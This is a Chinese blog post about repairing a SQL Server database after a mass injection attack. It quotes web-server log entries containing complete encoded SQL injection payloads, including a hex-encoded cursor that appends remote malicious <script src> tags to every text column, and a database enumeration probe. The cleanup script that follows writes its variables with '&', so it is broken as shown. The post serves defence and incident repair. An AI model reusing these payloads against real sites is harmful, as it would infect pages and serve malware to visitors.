`
Gboshi
  • 浏览: 15398 次
  • 性别: Icon_minigender_1
  • 来自: 西安
社区版块
存档分类
最新评论

XSS病毒攻击后的数据修复

阅读更多

近期客户网站遭遇JS木马病毒攻击,一般攻击的是SQL SERVER 2000数据库。

其源码如下:

攻击:第一次的时候什么大侠123来着忘记了,这次呢又是这个!~~~

<script src=http://3bom%62%2Ecom/c.js></script>

 

呵呵 看来并非SQL POST         或者  GET 注入了 ,因为我已经将SQL一般注入防止了。

我们看看网站日志:

2008年12月28日    ex081228.log 数据日志:

异常信息:

activity_view.asp key=3%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%3 -

异常信息:

/news_view.asp key=132|41|80040e07|将_varchar_值

activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -

以上信息自己分析吧  ,这里不多讲了

下面处理数据库的SQL程序:

declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc  
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
    open tb
        fetch next from tb into &tbName,&colName
        while &&fetch_status=0
            begin
                set &str='<script src=http://3bom%62%2Ecom/c.js>'
                set &dd =''''''
                set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where  '
                set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
                --print &sql
                exec(&sql)
                fetch next from tb into &tbName,&colName
            end
    close tb
deallocate tb  

  

分享到:
评论

相关推荐

    XSS蠕虫&病毒--即将发生的威胁与最好的防御

    5. **加强监测与响应**:建立有效的监测系统,一旦发现XSS攻击迹象,立即采取行动隔离并修复受影响的部分。 通过综合运用这些策略,企业和组织可以有效减少XSS蠕虫与病毒带来的威胁,保护用户的信息安全。 #### ...

    XSS利用文档

    1. 防御策略:防御XSS攻击的关键在于对用户输入进行严格的验证和过滤,确保所有用户提交的数据都被正确转义。此外,使用HTTP-only cookies可以防止会话cookie被JavaScript访问,从而降低攻击风险。内容安全策略...

    xss源码,并且整体风格编辑过

    DOM型XSS则涉及客户端JavaScript的DOM(文档对象模型),攻击者通过修改DOM树中的数据,导致页面上的JavaScript执行恶意代码。 XSS攻击可以做的事情非常多,几乎涵盖JavaScript能实现的所有功能: 1. **会话劫持**...

    xss_talk:我的XSS演讲的幻灯片和演示应用程序

    - 用户数据泄露:攻击者可以通过XSS获取用户的登录凭据、个人数据等。 - 钓鱼攻击:伪造页面,诱导用户执行操作,如点击恶意链接或提交个人信息。 - 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 ...

    基于数据挖掘技术的计算机网络病毒防御技术.pdf

    随着计算机技术的飞速发展,信息安全问题日益凸显,尤其是计算机...同时,为了防止网络攻击和病毒入侵,还需采取必要的技术措施,包括但不限于漏洞修复、入侵检测系统部署和安全策略制定等,以保护信息系统免受攻击。

    跨站脚本攻击实例解析

    跨站脚本攻击(Cross-Site Scripting,简称XSS)是网络安全领域中常见的攻击手段之一,它利用了Web应用程序的不足,使攻击者能够注入恶意脚本到网页上,进而影响用户的安全。这种攻击方式可能导致用户数据泄露、会话...

    cross_site_scripting.pdf

    这种攻击利用了信任关系,即用户对合法网站的信任,使得攻击者能够通过受害者的浏览器执行任意代码,从而盗取敏感数据、篡改网页或传播病毒等。 ### 二、XSS攻击的类型 XSS攻击主要分为三种类型: 1. **存储型XSS...

    电信设备-跨站攻击解决方法、移动终端及存储介质.zip

    在IT行业中,安全是至关重要的一个领域,尤其是对于电信设备来说,它们承载着大量的通信数据,因此必须具备抵御各种攻击的能力。"电信设备-跨站攻击解决方法、移动终端及存储介质.zip"这个压缩包文件显然关注的是...

    脚本入侵专题(包括国内国外的一些文档)

    脚本入侵,也称为跨站脚本攻击(Cross-Site Scripting,简称XSS),是指攻击者在Web页面中注入恶意脚本,当用户浏览这些页面时,恶意脚本会在用户的浏览器中执行,从而盗取用户敏感信息或破坏网站功能。这种攻击方式...

    2022年网络信息系统安全应急预案范文.doc

    这包括Web应用程序的安全,如SQL注入、跨站脚本(XSS)攻击,以及软件的授权和访问控制。未验证的用户输入、不安全的默认设置、不恰当的数据加密都可能导致数据泄露或系统被操纵。 4. 应急组织机构和职责 应急组织...

    「数据安全」国家网络空间威胁情报大数据共享开放平台建设的思考 - 安全研究.zip

    平台需要防范常见的Web攻击,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)。应用防火墙(WAF)和安全编码实践对于防止这些攻击至关重要。 3. **安全防御**:安全防御体系包括预防、检测和响应机制。预防措施...

    信息安全_数据安全_认证体制研究.pdf

    安全威胁无处不在,从传统的病毒和木马到现代的勒索软件和零日攻击,都对网络安全构成严重挑战。因此,安全对抗策略必须不断演进。这包括强化网络安全防护、实施安全培训、采用先进的安全技术和制定完善的安全政策。...

    HackReal.4:由_PC_端安全问题引发的重重隐患.pdf

    6. **蠕虫攻击**:通过邮件传播的蠕虫病毒可以自我复制并执行各种恶意行为,如发送更多邮件、查看用户的好友列表等,这在Wooyun的报告中也有提及。 7. **PC端与移动端的安全**:不仅PC端的邮箱服务存在安全隐患,...

    「安全众测」专业逆向人才培养模式探讨与实践 - 数据安全.zip

    1. Web应用安全:Web安全主要关注SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等常见攻击手法,逆向工程师需要掌握Web渗透测试技巧,发现并修复这些漏洞。 2. OWASP(Open Web Application Security Project)...

    返利网 PHP (无病毒版)

    在部署和运行此类源码时,仍需注意定期更新、修复漏洞,防止SQL注入、XSS跨站脚本攻击等常见Web安全问题。 5. **网站功能**:一个典型的返利网可能包括以下功能: - 用户注册/登录系统:允许用户创建账户、管理...

    安全性方面的英文翻译

    - 跨站脚本(XSS)攻击:在网页中注入可执行的脚本,以盗取用户数据或操纵用户浏览器。 为了防范这些安全威胁,我们需要实施多层次的安全策略,包括防火墙、入侵检测系统、数据加密、身份验证、访问控制、安全更新...

    WebSecurityGuard

    WebSecurityGuard是一款专注于Web安全检测与监控的工具,它旨在帮助企业及个人用户保护其网站免受各种网络威胁,如SQL注入、跨站脚本攻击(XSS)、钓鱼攻击、恶意软件感染等。这款工具通过实时监测、深度扫描和智能...

    实验十一-网站程序与网站安全.pdf

    3. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器中执行恶意脚本,可能导致数据泄露、会话劫持等。防止XSS攻击的方法包括正确地编码输出、使用HTTPOnly Cookie防止会话令牌被盗,以及利用Content Security ...

    「系统安全」正义黎明:关于网络空间安全竞赛与人才的若干思考 - 渗透测试.zip

    它是一种模拟攻击者行为,对系统、网络或应用程序进行的授权测试,目的是发现并修复潜在的安全漏洞。渗透测试包括了多种技术,如网络扫描、漏洞利用、社会工程学等,旨在评估组织的安全防御能力。了解和掌握这些技术...

    jieqi1.7安全增强版

    3. **XSS跨站脚本防护**:为了防止XSS攻击,系统加强了对输出内容的过滤和编码,避免攻击者通过在页面上插入恶意脚本来窃取用户信息或进行其他破坏行为。 4. **文件上传安全**:杰奇1.7增强了文件上传功能的安全性...

Global site tag (gtag.js) - Google Analytics